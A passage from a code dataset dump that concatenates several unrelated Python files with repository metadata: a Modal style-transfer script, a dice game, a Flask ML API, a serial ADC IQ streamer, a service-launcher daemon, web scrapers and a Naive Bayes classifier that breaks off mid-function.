download_model_to_folder():\n from huggingface_hub import snapshot_download\n import os\n\n 
os.makedirs(MODEL_DIR, exist_ok=True)\n\n snapshot_download(\n BASE_MODEL,\n local_dir=MODEL_DIR,\n token=os.environ[\"HUGGINGFACE_TOKEN\"],\n )\n\n\ndef instantiate_model():\n \"\"\"Useful to pre-load the required weights\"\"\"\n import sys\n\n sys.path.append(ARTFUSION_PATH)\n from omegaconf import OmegaConf\n from main import instantiate_from_config\n\n config = OmegaConf.load(CFG_PATH)\n config.model.params.ckpt_path = CKPT_PATH\n config.model.params.first_stage_config.params.ckpt_path = None\n model = instantiate_from_config(config.model)\n\n\nimage = (\n Image.debian_slim()\n .apt_install(\"python3-opencv\")\n .pip_install(\n \"torch\",\n \"torchvision\",\n \"pytorch-lightning\",\n \"omegaconf\",\n \"einops\",\n \"transformers\",\n \"imageio\",\n \"imageio-ffmpeg\",\n \"hf-transfer~=0.1\",\n )\n .apt_install(\"git\")\n .run_commands(\n f\"cd / && mkdir -p {ARTFUSION_PATH} && cd {ARTFUSION_PATH} && git clone --depth 1 {ARTFUSION_GITHUB_PATH} .\",\n force_build=False,\n )\n .run_commands(f\"cd / && mkdir -p {MODEL_DIR}\")\n .run_function(\n download_model_to_folder, secret=Secret.from_name(\"my-huggingface-secret\")\n )\n .run_function(instantiate_model)\n)\n\n\ndef preprocess_image(image, size=(256, 256), max_size=256):\n import numpy as np\n import torch\n from einops import rearrange\n\n if not image.mode == \"RGB\":\n image = image.convert(\"RGB\")\n image.thumbnail((max_size, max_size))\n image = np.array(image).astype(np.uint8)\n image = (image / 127.5 - 1.0).astype(np.float32)\n image = rearrange(image, \"h w c -> c h w\")\n return torch.from_numpy(image)[None, :].to(DEVICE)\n\n\ndef tensor_to_rgb(x):\n import torch\n\n return torch.clamp((x + 1.0) / 2.0, min=0.0, max=1.0)\n\n\ndef convert_samples(samples):\n from einops import rearrange\n from PIL import Image\n import numpy as np\n\n if isinstance(samples, (list, tuple)):\n samples = torch.cat(samples, dim=0)\n\n samples = rearrange(samples[0, :], \"c h w -> h w c\").cpu().numpy() * 255.0\n samples = Image.fromarray(samples.astype(np.uint8))\n return samples\n\n\n@stub.cls(image=image, gpu=gpu.Any())\nclass StyleTransfer:\n def __enter__(self):\n from omegaconf import OmegaConf\n from pytorch_lightning import seed_everything\n import sys\n\n sys.path.append(ARTFUSION_PATH)\n from main import instantiate_from_config\n\n seed_everything(42)\n\n config = OmegaConf.load(CFG_PATH)\n config.model.params.ckpt_path = CKPT_PATH\n config.model.params.first_stage_config.params.ckpt_path = None\n model = instantiate_from_config(config.model)\n\n self.model = model.eval().to(DEVICE)\n\n def get_content_style_features(\n self, content_image, style_image, max_size=256, style_size=256\n ):\n import torch\n\n model = self.model\n style_image = preprocess_image(style_image, max_size=style_size)\n content_image = preprocess_image(content_image, max_size=max_size)\n\n with torch.no_grad(), model.ema_scope(\"Plotting\"):\n vgg_features = model.vgg(model.vgg_scaling_layer(style_image))\n c_style = model.get_style_features(vgg_features)\n null_style = c_style.clone()\n null_style[:] = model.null_style_vector.weight[0]\n\n content_encoder_posterior = model.encode_first_stage(content_image)\n content_encoder_posterior = model.get_first_stage_encoding(\n content_encoder_posterior\n )\n c_content = model.get_content_features(content_encoder_posterior)\n null_content = torch.zeros_like(c_content)\n\n c = {\"c1\": c_content, \"c2\": c_style}\n c_null_style = {\"c1\": c_content, \"c2\": null_style}\n c_null_content = {\"c1\": null_content, \"c2\": 
c_style}\n\n return c, c_null_style, c_null_content\n\n def style_transfer(\n self,\n content_image,\n style_image,\n content_s,\n style_s,\n ddim_steps,\n eta,\n max_size=None,\n style_size=None,\n ):\n import torch\n\n c, c_null_style, c_null_content = self.get_content_style_features(\n content_image, style_image, max_size=max_size, style_size=style_size\n )\n\n with torch.no_grad(), self.model.ema_scope(\"Plotting\"):\n samples = self.model.sample_log(\n cond=c,\n batch_size=1,\n x_T=torch.rand_like(c[\"c1\"]),\n ddim=True,\n ddim_steps=ddim_steps,\n eta=eta,\n unconditional_guidance_scale=content_s,\n unconditional_conditioning=c_null_content,\n unconditional_guidance_scale_2=style_s,\n unconditional_conditioning_2=c_null_style,\n )[0]\n\n x_samples = self.model.decode_first_stage(samples)\n x_samples = tensor_to_rgb(x_samples)\n\n return x_samples\n\n @method()\n def generate(\n self,\n content_bytes=None,\n style_bytes=None,\n content_strength=0.5,\n style_strength=1.0,\n max_size=256,\n style_size=256,\n ddim_steps=10,\n eta=0,\n ):\n from PIL import Image\n\n import io\n\n content_image = Image.open(io.BytesIO(content_bytes))\n style_image = Image.open(io.BytesIO(style_bytes))\n\n x_samples = self.style_transfer(\n content_image,\n style_image,\n content_s=content_strength,\n style_s=style_strength,\n max_size=max_size,\n style_size=style_size,\n ddim_steps=ddim_steps,\n eta=eta,\n )\n\n x_samples = convert_samples(x_samples)\n\n img_bytes = io.BytesIO()\n x_samples.save(img_bytes, format=\"PNG\")\n\n return img_bytes.getvalue()\n\n\n@stub.local_entrypoint()\ndef main(\n content_file_name: str,\n style_file_name: str,\n content_strength: float = 0.5,\n style_strength: float = 1.0,\n max_size: int = 512,\n style_size: int = 256,\n eta: float = 0,\n ddim_steps: int = 10,\n):\n import io\n\n with open(content_file_name, \"rb\") as f:\n content_bytes = io.BytesIO(f.read()).getvalue()\n with open(style_file_name, \"rb\") as f:\n style_bytes = io.BytesIO(f.read()).getvalue()\n\n image_bytes = StyleTransfer().generate.remote(\n content_bytes,\n style_bytes,\n content_strength=content_strength,\n style_strength=style_strength,\n max_size=max_size,\n style_size=style_size,\n eta=eta,\n ddim_steps=ddim_steps,\n )\n output_path = \"output.png\"\n with open(output_path, \"wb\") as f:\n f.write(image_bytes)\n","repo_name":"cadolphs/style-transfer","sub_path":"simple_script.py","file_name":"simple_script.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6263741417","text":"from items import*\nimport random\n\nclass dice(clickable):\n def __init__(self,x,y,w,h,name, val ,backgroundColor = color(255)):\n super(dice, self).__init__(x,y,w,h,name,backgroundColor = backgroundColor)\n self.val=val\n \n def display(self): \n fill(255)\n if self.val == 1:\n self.diceOne()\n if self.val == 2:\n self.diceTwo()\n if self.val == 3:\n self.diceThree()\n if self.val == 4:\n self.diceFour()\n if self.val == 5:\n self.diceFive()\n if self.val == 6:\n self.diceSix()\n \n def onClick(self, *args):\n self.diceRoll()\n \n def onHover(self):\n pass\n \n def diceRoll(self):\n self.val = random.randint(1,6) \n \n def diceOne(self):\n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.5*self.w,self.y+0.5*self.h,0.2*self.w,0.2*self.h)\n \n def diceTwo(self):\n fill(self.backgroundColor)\n rect(self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x 
+ 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n \n def diceThree(self):\n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.5*self.w,self.y+0.5*self.h,0.2*self.w,0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n \n def diceFour(self):\n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.25 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n \n \n def diceFive(self):\n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.25 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.5*self.w,self.y+0.5*self.h,0.2*self.w,0.2*self.h)\n \n \n def diceSix(self): \n fill(self.backgroundColor)\n rect (self.x,self.y,self.w,self.h,10,10,10,10)\n fill(10)\n ellipse(self.x + 0.25 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.25 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.25 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.75 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.25 * self.w, self.y + 0.5 * self.h, 0.2*self.w, 0.2*self.h)\n ellipse(self.x + 0.75 * self.w, self.y + 0.5 * self.h, 0.2*self.w, 0.2*self.h)\n \n def copy(self):\n return dice(self.x,self.y,self.w,self.h,self.name,self.val,self.backgroundColor)\n \nclass diceGroup(clickable): \n def __init__(self,x,y,w,h,name, *dice):\n super(diceGroup, self).__init__(x,y,w,h,name)\n self.dice=list()\n self._observers = []\n for d in dice: \n self.dice.append(d)\n \n def display(self):\n for d in self.dice:\n d.display()\n \n def onClick(self):\n for d in self.dice:\n d.onClick()\n \n def addDice(self,d):\n if isinstance(dice,d):\n self.dice.append(d)\n \n def bindTo(self,callback):\n self._observers.append(callback)\n \n\n#some secific items I made for the setup screen\nclass setupDice(dice):\n def __init__(self, x,y,w,h,name, val, backgroundColor = color(255)):\n super(setupDice, self).__init__(x,y,w,h,name, val,backgroundColor = backgroundColor)\n self.active = None\n \nclass setupDiceGroup(diceGroup):\n def __init__(self,x,y,w,h,name,game,*dice):\n super(setupDiceGroup,self).__init__(x,y,w,h,name,*dice)\n self.results = []\n self.amountActive = 2\n self.winningDice = 0\n self.game = game\n self.changeAmount(2)\n \n def onClick(self):\n self.winningDice = 0\n self.results = []\n for d in self.dice:\n if d.active:\n d.onClick()\n self.results.append(d.val)\n try: \n self.winningDice = self.results.index(max(self.results))\n except:\n self.winningDice = 0\n self.game._currentPlayer = self.game.setPlayer(self.game.players[self.winningDice])\n self.game.currentPlayerIndex = self.winningDice\n \n def changeAmount(self, 
amount):\n if amount == 2:\n self.amountActive = 2\n self.dice[0].active = True\n self.dice[1].active = True\n self.dice[2].active = False\n self.dice[3].active = False\n elif amount == 3:\n self.amountActive = 3\n self.dice[0].active = True\n self.dice[1].active = True\n self.dice[2].active = True\n self.dice[3].active = False\n else:\n self.amountActive = 4\n self.dice[0].active = True\n self.dice[1].active = True\n self.dice[2].active = True\n self.dice[3].active = True\n \n def display(self):\n for d in self.dice:\n if d.active:\n d.display()\n \nclass varDiceGroup(diceGroup):\n def __init__(self,x,y,w,h,name,parents,attrname,function,*dice):\n super(varDiceGroup,self).__init__(x,y,w,h,name,*dice)\n self.amount = 0\n self.parents = parents\n self.attrname = attrname\n for x in self.parents:\n x.bindTo(self.update)\n self.function = function\n self.sum = 0\n \n def update(self, value):\n self.amount = getattr(value,self.attrname)\n self.resetDice()\n \n def resetDice(self):\n self.dice = list()\n for x in range(self.amount):\n d = dice(self.x + 100*x,self.y,100,100,'',1)\n self.dice.append(d.copy())\n \n def onClick(self):\n self.sum = 0\n for d in self.dice:\n d.onClick()\n self.sum += d.val\n for callback in self._observers:\n callback(self) \n self.function(self.sum)\n \n \n \n \n\n \n \n \n","repo_name":"QuintenVerheij/digitalComponent","sub_path":"digitalComponent/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":7051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30198586695","text":"from flask import Flask, render_template, jsonify, request\nfrom flask_api import status\nfrom flask_cors import CORS\nimport pickle\nimport numpy as np\nimport pandas as pd\n\n# Importing machine learning model\n\nimport spacy, nltk\nfrom model.movie_recommender import MovieRecommendation\nfrom sklearn.feature_extraction.text import CountVectorizer\nnlp = spacy.load('en_core_web_sm')\nstop_words = nlp.Defaults.stop_words\nps = nltk.PorterStemmer()\n\napp = Flask(__name__)\nMovieRecommendation()\nmovieRecommendation = pickle.load(open('./model/model.pkl','rb'))\nspam_classifier = pickle.load(open('./model/spam_classifier.pkl','rb'))\n\nCORS(app)\n\n@app.route('/api/get')\ndef get_data():\n return jsonify(posts)\n\n\n@app.route('/api/recommended-movie', methods=['POST', 'GET'])\ndef get_recommendation():\n movie = request.json['movie']\n movie_list = movieRecommendation.get_recommended_movies(movie)\n\n movie_list = dict(movie_list)\n if movie_list['success'] == True:\n return movie_list, status.HTTP_200_OK\n else:\n return movie_list, status.HTTP_500_INTERNAL_SERVER_ERROR\n\n\n@app.route('/api/email-classifier', methods=['POST', 'GET'])\ndef classify_email():\n message = request.json['message']\n\n corpus = pd.Series([message])\n corpus = corpus.apply(lambda x: ' '.join(ps.stem(x) for term in x.split() if not term in stop_words))\n\n cv = CountVectorizer()\n X = cv.fit_transform(corpus).toarray()\n \n print(X, 'sadasdasasdas')\n prediction = spam_classifier.predict(X)\n\n print(prediction, 'value predicted')\n\n \n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"VinayDagar/flask-ml","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41474897370","text":"#!/usr/bin/env python3\n\nimport binascii\nimport serial\nimport struct\nimport time\nimport os\nimport sys\nfrom 
threading import Thread, Lock\n\nGPIOA = 0x00\nGPIOB = 0x01\n\nGPIO_INPUT = 0x00\nGPIO_OUTPUT = 0x10\nGPIO_MUX = 0x08\nGPIO_ANALOG = 0x03\n\nGPIO_PULL_NONE = 0x04\nGPIO_PULL_UP = 0x18\nGPIO_PULL_DOWN = 0x28\n\nCFG_GPIO_PIN = 0x1000\nCFG_DMA = 0x1001\nCFG_ADC = 0x1002\nTRIGGER_ADC = 0x1003\nREAD_ADC = 0x1004\nSET_GPIO_PIN = 0x1005\n\n\nclass Command:\n\n def __init__(self, cmd_code, args=[]):\n self.cmd_code = cmd_code\n self.args = [a for a in args if a is not None]\n\n def serialize(self):\n return struct.pack(\"I%s\"%(\"I\"*len(self.args),), self.cmd_code, *self.args)\n\n\nclass Client:\n\n def __init__(self):\n self.tty = serial.Serial(\"/dev/ttyACM0\", timeout=0.2)\n\n def write(self, data):\n self.tty.write(data)\n\n def read(self, count=8):\n return self.tty.read(count)\n\n def read2(self, count, timeout):\n data = b\"\"\n start = time.time()\n while (time.time()-start) < timeout and len(data) < count:\n data += self.read(count)\n return data\n\n def configure_dma(self):\n cmd = Command(CFG_DMA, [])\n self.write(cmd.serialize())\n cmd_code, status = struct.unpack(\"II\", self.read())\n if cmd_code != CFG_DMA or status != 0:\n sys.stderr.write(\"error! configure_dma failed!\")\n sys.stderr.write(cmd_code, status)\n\n def configure_adc(self):\n cmd = Command(CFG_ADC, [])\n self.write(cmd.serialize())\n d = self.read()\n cmd_code, status = struct.unpack(\"II\", d)\n if cmd_code != CFG_ADC or status != 0:\n sys.stderr.write(\"error! configure_adc failed!\")\n sys.stderr.write(cmd_code, status)\n\n def trigger_adc(self):\n cmd = Command(TRIGGER_ADC, [])\n self.write(cmd.serialize())\n d = self.read()\n cmd_code, status = struct.unpack(\"II\", d)\n if cmd_code != TRIGGER_ADC or status != 0:\n sys.stderr.write(\"error! trigger_adc failed!\")\n sys.stderr.write(cmd_code, status)\n\n def read_adc(self):\n with open(\"output.iq\", \"wb\") as f:\n cmd = Command(READ_ADC, [])\n self.write(cmd.serialize())\n while True:\n data = self.read2(3072, 2)\n yield(data)\n f.write(data)\n f.flush()\n\n\n def configure_gpio(self, group, pin, mode, value=None):\n cmd = Command(CFG_GPIO_PIN, [group, pin, mode, value])\n pld = cmd.serialize()\n self.write(pld)\n response = self.read()\n print(response)\n cmd_code, status = struct.unpack(\"II\", response)\n if cmd_code != CFG_GPIO_PIN or status != 0:\n print(\"error! configure_gpio failed!\", file=sys.stderr)\n print(cmd_code, status, file=sys.stderr)\n\nc = Client()\n\n# ADC Inputs\nc.configure_gpio(GPIOA, 6, GPIO_ANALOG)\nc.configure_gpio(GPIOA, 7, GPIO_ANALOG)\nc.configure_gpio(GPIOB, 0, GPIO_ANALOG)\nc.configure_gpio(GPIOB, 1, GPIO_ANALOG)\n\n# c.configure_gpio(GPIOB, 2, GPIO_OUTPUT, 0)\n# c.configure_gpio(GPIOA, 9, GPIO_OUTPUT, 1)\n# c.configure_gpio(GPIOA, 10, GPIO_OUTPUT, 1)\n\nc.configure_dma()\nc.configure_adc()\nc.trigger_adc()\n\nstart = time.time()\nsample_count = 0\nfor data in c.read_adc():\n\n # unpack IQ from SC12 -> SC16\n shorts_out = []\n while len(data) >= 3:\n I = (data[0]<<4) | (data[1]>>4)\n Q = ((data[1]&0xf)<<8) | data[2]\n data = data[3:]\n shorts_out.append(I)\n shorts_out.append(Q)\n\n # complex shorts -> stdout (to eg. 
baudline)\n sample_count += len(shorts_out)/2\n data_out = struct.pack(\"H\"*len(shorts_out), *shorts_out)\n sys.stdout.buffer.write(data_out)\n sys.stdout.flush()\n\n # print the sample rate once per second\n if (time.time()-start) >= 1.0:\n sys.stderr.buffer.write(b\"%d samples per second\\n\" % (sample_count/(time.time()-start)))\n sys.stderr.flush()\n sample_count = 0\n start = time.time()\n","repo_name":"marcnewlin/human-detector-detector","sub_path":"stream-iq.py","file_name":"stream-iq.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"11617831484","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 26 10:27:40 2016\n\n@author: Dani\n\"\"\"\n\nimport os\nimport glob\nimport re\nimport sys\n\nfrom time import sleep\n\nfrom utils import retrCwd\n\nfrom importlib import import_module, reload, invalidate_caches\n\nfrom tempfile import gettempdir as gettemp\n\nfrom daemon import Daemon\n\nfrom ServiceLogger import ServiceLogger\n\nfrom services.ServiceException import LoggerException, ScheduleException, ScriptException\n\n\ncwd = retrCwd()\nos.chdir(os.path.dirname(cwd))\nsvcdir = os.path.join(cwd, \"services\")\nsys.path.append(svcdir)\n\n\nclass ServiceLauncherDaemon(Daemon):\n \n _svc_name_ = \"PySvcLauncher\"\n _svc_display_name_ = \"Lanzador de servicios python\"\n _svc_description_ = \"Servicio de gestión de ejecución de scripts de Python\"\n \n def __init__(self, *args, **kwargs):\n Daemon.__init__(self, *args, **kwargs)\n self.logger = ServiceLogger(\"servicelauncher.log\", \"servicelauncher\", 'ServiceLauncher')\n\n def log(self, message):\n self.logger.log(message)\n \n def run(self):\n instances = {}\n modules = {}\n while 1:\n\n \"\"\" Ok, here's the real money shot right here.\n [actual service code between rests] \"\"\"\n svcscripts = glob.glob(os.path.join(svcdir, \"*Svc.py\"))\n svcscripts = [re.split(r'[\\\\/]+', s)[-1] for s in svcscripts]\n\n for script in svcscripts:\n try:\n if script not in modules.keys():\n modules.update({script: import_module(script[:-3])})\n else:\n modules[script] = reload(modules[script])\n except Exception as x:\n self.log(\"%s:%s - Error: %s at %d\" %\n (self._svc_name_, script, str(x), sys.exc_info()[-1].tb_lineno))\n continue\n\n todel = []\n for script in [s for s in svcscripts if s not in instances.keys()]:\n try:\n aux_class = getattr(modules[script], script[:-6])\n instances.update({script: aux_class()})\n except Exception as x:\n self.log(\"%s:%s - Error: %s at %d\" %\n (self._svc_name_, script, str(x), sys.exc_info()[-1].tb_lineno))\n if script in instances.keys():\n todel.append(script) # Service will be forced to reload Script\n continue\n self.log('\"%s\" Added to Script list' % (script,))\n\n if len(todel) > 0:\n for script in todel:\n del instances[script]\n del todel\n invalidate_caches()\n\n for script in [s for s in instances.keys() if s not in svcscripts]:\n try:\n del instances[script]\n except Exception as x:\n self.log(\"%s:%s - Error: %s at %d\" %\n (self._svc_name_, script, str(x), sys.exc_info()[-1].tb_lineno))\n continue\n self.log('\"%s\" Removed from Script list' % (script,))\n\n todel = []\n for script in instances.keys():\n try:\n instances[script].run()\n except(ScriptException, LoggerException, ScheduleException) as x:\n self.log(str(x))\n todel.append(script) # Service will be forced to reload Script\n continue\n except Exception as x:\n self.log(\"%s:%s - Error: %s at %d\" %\n (self._svc_name_, 
script, str(x), sys.exc_info()[-1].tb_lineno))\n todel.append(script) # Service will be forced to reload Script\n continue\n\n if len(todel) > 0:\n for script in todel:\n del instances[script]\n del todel\n invalidate_caches()\n\n sleep(60)\n\n \"\"\" [actual service code between rests] \"\"\"\n\n \nif __name__ == '__main__':\n daemon = ServiceLauncherDaemon(os.path.join(gettemp(), 'daemon-example.pid'))\n if len(sys.argv) == 2:\n if 'start' == sys.argv[1]:\n daemon.start()\n elif 'stop' == sys.argv[1]:\n daemon.stop()\n elif 'restart' == sys.argv[1]:\n daemon.restart()\n else:\n print(\"Unknown command\")\n sys.exit(2)\n sys.exit(0)\n else:\n print(\"usage: %s start|stop|restart\" % (sys.argv[0],))\n sys.exit(2)\n\n","repo_name":"danielperezr88/unixpythonservicelauncher","sub_path":"ServiceLauncher.py","file_name":"ServiceLauncher.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38046637629","text":"# -*- coding: utf-8 -*-\nimport itertools\n\nfrom scrapy import log\nfrom scrapy.selector import Selector\n\nfrom summaries.items import SummariesItem\n\nimport thread_float_bbs\n\n\nclass HimarinSpider(thread_float_bbs.ThreadFloatBbsSpider):\n \"\"\" for himarin.net\n \"\"\"\n name = 'himarin'\n allowed_domains = ['himarin.net']\n start_urls = ['http://himarin.net/index.rdf']\n\n def spider_page(self, response):\n \"\"\" scraping page\n \"\"\"\n sel = Selector(response)\n\n contents = []\n image_urls = []\n generator = itertools.izip(sel.css('.t_h'), sel.css('.t_b'))\n for index, (sub, body) in enumerate(generator):\n\n image_urls.extend(sub.css('img').xpath('@src').extract())\n image_urls.extend(body.css('img').xpath('@src').extract())\n\n contents.append({\n \"index\": index,\n \"subject\": sub.extract(),\n \"body\": body.extract()\n })\n\n item = dict(\n posted=False,\n source=self.extract_source(sel),\n url=response.url,\n title=self.get_text(sel.xpath('//h2')),\n tags=self.extract_tags(sel, response),\n contents=contents,\n image_urls=image_urls\n )\n # set title from source.\n return self.request_title(item['source'], SummariesItem(**item))\n\n def extract_source(self, selector):\n \"\"\" Sourceを抽出\n \"\"\"\n try:\n return [\n href for href\n in selector.css('span > a').xpath('@href').extract()\n if href.find('2ch.net') != -1\n or href.find('2ch.sc') != -1\n ][0]\n except Exception as exc:\n log.msg(\n format=(\"Extract source (error): \"\n \"Error selector %(selector)s \"\n \"url `%(url)s`: %(errormsg)s\"),\n level=log.WARNING,\n spider=self,\n selector=selector,\n url=selector.response.url,\n errormsg=str(exc))\n return None\n\n def extract_tags(self, selector, response):\n \"\"\" tagsを抽出\n \"\"\"\n try:\n feed = self.get_feed(response.url)\n tag = [\n self.get_text(tag)\n for tag in selector.css('.article-info > a')\n ][-1]\n\n return list({feed['tags'][0]['term'], tag})\n except Exception as exc:\n log.msg(\n format=(\"Extract tags (error): \"\n \"Error selector %(selector)s \"\n \"url `%(url)s`: %(errormsg)s\"),\n level=log.WARNING,\n spider=self,\n selector=selector,\n url=response.url,\n errormsg=str(exc))\n return []\n","repo_name":"ikeikeikeike/scrapy-2ch-summary-spiders","sub_path":"himarin.py","file_name":"himarin.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27729702011","text":"#This is a webscraper\r\n\r\nfrom urllib.request import Request, urlopen\r\nfrom bs4 
import BeautifulSoup\r\nimport requests\r\n\r\nroot = \"https://www.google.ca/\"\r\nlink = \"https://www.google.com/search?q=health&safe=strict&rlz=1C1RXQR_koCA940CA940&sxsrf=ALeKk02GvKeIkO3ng1RJOk5x7VLdYfZPYw:1617967767469&source=lnms&tbm=nws&sa=X&ved=2ahUKEwiYtabQh_HvAhV8FlkFHcqsBGwQ_AUoA3oECAIQBQ&biw=669&bih=937\"\r\n\r\nreq = Request(link, headers={'User-Agent': 'Mozilla/5.0'})\r\nwebpage = urlopen(req).read()\r\nwith requests.Session() as c:\r\n soup = BeautifulSoup(webpage, 'html5lib')\r\n #print(soup)\r\n for item in soup.find_all('div', attrs={'class': 'ZINbbc xpd O9g5cc uUPGi'}):\r\n raw_link = (item.find('a', href=True)['href'])\r\n link = raw_link.split(\"/url?q=\")[1].split('&sa=U&')[0]\r\n #print(item)\r\n title = (item.find('div', attrs={'class': 'BNeawe vvjwJb AP7Wnd'}).get_text())\r\n description = (item.find('div', attrs={'class': 'BNeawe s3v9rd AP7Wnd'}).get_text())\r\n\r\n title = title.replace(\",\", \"\")\r\n description = description.replace(\",\", \"\")\r\n\r\n time = description.split(\" · \")[0]\r\n script = description.split(\" · \")[1]\r\n #print(title)\r\n #print(link)\r\n #print(time)\r\n #print(script)\r\n document = open(\"newsdata.csv\", \"a\")\r\n document.write(\"{}, {}, {}, {} \\n\".format(title, time, script, link))\r\n document.close()\r\n","repo_name":"HYEJI123/ICS4U-Project","sub_path":"newscrapper.py","file_name":"newscrapper.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2624039753","text":"from sklearn.base import BaseEstimator\nimport numpy as np\nimport scipy.stats as stats\nfrom collections import Counter\n# For this assignment we will implement the Naive Bayes classifier as a\n# a class, sklearn style. 
You only need to modify the fit and predict functions.\n# Additionally, implement the Disparate Impact measure as the evaluateBias function.\nclass NBC(BaseEstimator):\n '''\n (a,b) - Beta prior parameters for the class random variable\n alpha - Symmetric Dirichlet parameter for the features\n '''\n\n def __init__(self, a=1, b=1, alpha=1):\n self.a = a\n self.b = b\n self.alpha = alpha\n self.__params = None\n \n def get_a(self):\n return self.a\n\n def get_b(self):\n return self.b\n\n def get_alpha(self):\n return self.alpha\n\n # you need to implement this function\n\n def fit(self,X,y):\n '''\n This function does not return anything\n \n Inputs:\n X: Training data set (N x d numpy array)\n y: Labels (N length numpy array)\n '''\n a = self.get_a()\n b = self.get_b()\n alpha = self.get_alpha()\n self.__classes = np.unique(y)\n params = {}\n # remove next line and implement from here\n # you are free to use any data structure for paramse\n \n oneValues = np.count_nonzero(y == 1)\n twoValues = np.count_nonzero(y == 2)\n \n theta1 = (oneValues + a) / (y.size + a + b)\n theta2 = 1 - theta1\n \n thetaTuple = (theta1, theta2)\n list_Y1 = {}\n list_Y2 = {}\n \n for j in range(X.shape[1]):\n list_Y1[j] = {}\n list_Y2[j] = {}\n \n kJ = np.unique(X[:,j]).shape[0]\n mJ = np.max(X[:,j])\n \n for k in range (0, mJ+1):\n s = 0\n s2 = 0\n \n for l in range (X.shape[0]):\n if k == X[l][j] and y[l] == 1:\n s = s + 1\n for l in range (X.shape[0]):\n if k == X[l][j] and y[l] == 2:\n s2 = s2 + 1 \n \n ans1 = (s + alpha) / (oneValues + kJ*alpha)\n \n ans2 = (s2 + alpha) / (twoValues + kJ*alpha)\n \n list_Y1[j][k] = ans1\n list_Y2[j][k] = ans2\n \n \n list_Y1[j][-1] = (alpha) / (oneValues + kJ*alpha)\n list_Y2[j][-1] = (alpha) / (twoValues + kJ*alpha)\n \n params = (thetaTuple, list_Y1, list_Y2)\n \n \n # do not change the line below\n self.__params = params\n \n # you need to implement this function\n def predict(self,Xtest):\n '''\n This function returns the predicted class for a given data set\n \n Inputs:\n Xtest: Testing data set (N x d numpy array)\n \n Output:\n predictions: N length numpy array containing the predictions\n '''\n params = self.__params\n a = self.get_a()\n b = self.get_b()\n alpha = self.get_alpha()\n #remove next line and implement from here\n j = 0\n predictions = []\n for j in range (Xtest.shape[0]):\n y1 = params[0][0]\n y2 = params[0][1]\n \n #find given product of Xj when y = 1 and y= 2\n prod1 = 1\n prod2 = 1\n for k in range (Xtest.shape[1]):\n temp = Xtest[j][k] \n \n #when attribute k has y = 1\n #when attribute k has y = 1\n #1 means the first library\n #k means each attribute\n #temp is the feature of kth attribute that jth person has\n if(temp in params[1][k].keys()):\n val1 = params[1][k][temp]\n else:\n val1 = params[1][k][-1]\n if(temp in params[2][k].keys()):\n #when attribute k has y = 2\n val2 = params[2][k][temp]\n else:\n val2 = params[2][k][-1]\n prod1 = prod1 * val1\n prod2 = prod2 * val2\n \n forYes = (y1 * prod1) / ((y1 * prod1) + (y2 * prod2))\n forNo = (y2 * prod2) / ((y2 *prod2) + (y1 * prod1))\n \n if forYes > forNo:\n predictions.append(1)\n else:\n predictions.append(2)\n #do not change the line below\n return predictions\n \ndef evaluateBias(y_pred,y_sensitive):\n '''\n This function computes the Disparate Impact in the classification predictions (y_pred),\n with respect to a sensitive feature (y_sensitive).\n \n Inputs:\n y_pred: N length numpy array\n y_sensitive: N length numpy array\n \n Output:\n di (disparateimpact): scalar value\n '''\n arrayS = 
